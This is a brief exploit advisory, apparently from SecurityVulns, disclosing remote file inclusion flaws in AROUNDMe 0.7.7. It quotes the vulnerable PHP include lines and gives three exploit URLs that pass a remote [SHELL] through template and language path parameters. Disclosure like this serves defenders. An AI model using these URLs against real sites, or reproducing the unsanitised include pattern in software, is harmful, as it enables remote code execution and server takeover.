SecurityvulnsSECURITYVULNS:DOC:16585AROUNDMe 0.7.7 Multiple Remote File Inclusion Vulnerabilities
AROUNDMe _0_7_7
Found by kezzap66345 *
Script
Download:http://download.savannah.gnu.org/releases/aroundme/aroundme_0_7_7.tar.gz
ERROR#1:
File:\components\core\inc\core_profile.header.php
include_once($language_path_core . 'inc/me_common.inc.php'); <<< rfi coded
RFI#1:
http://SITE.com/path/aroundme/components/core/inc/core_profile.header.php?language_path_core=[SHELL]
ERROR#2:
File:/components/core/template/barnraiser_01/maint_contact_view.tpl.php
<?php
include $template_path_core . "inc/comment.inc.php";
?> <<< rfi coded
ERROR#3:
File:/components/core/template/barnraiser_01/default.tpl.php
include_once($template_path . "inc/menu_" . $section . ".inc.php"); <<< rfi coded
RFI#3:
http://SITE.com/path/components/core/template/barnraiser_01/default.tpl.php?template_path=[SHELL]
ERROR#4:
File:/components/core/template/barnraiser_01/maint_contact_view.tpl.php
include($template_path_core . "inc/form_gui_html_editor.inc.php"); <<<
rfi coded
RFI#4:
http://SITE.com/path/components/core/template/barnraiser_01/maint_contact_view.tpl.php?template_path_core=[SHELL]
Thanks:Siircicocuk and x0r0n
ThanxSiiRCiCOCUK**str0ke**************************************************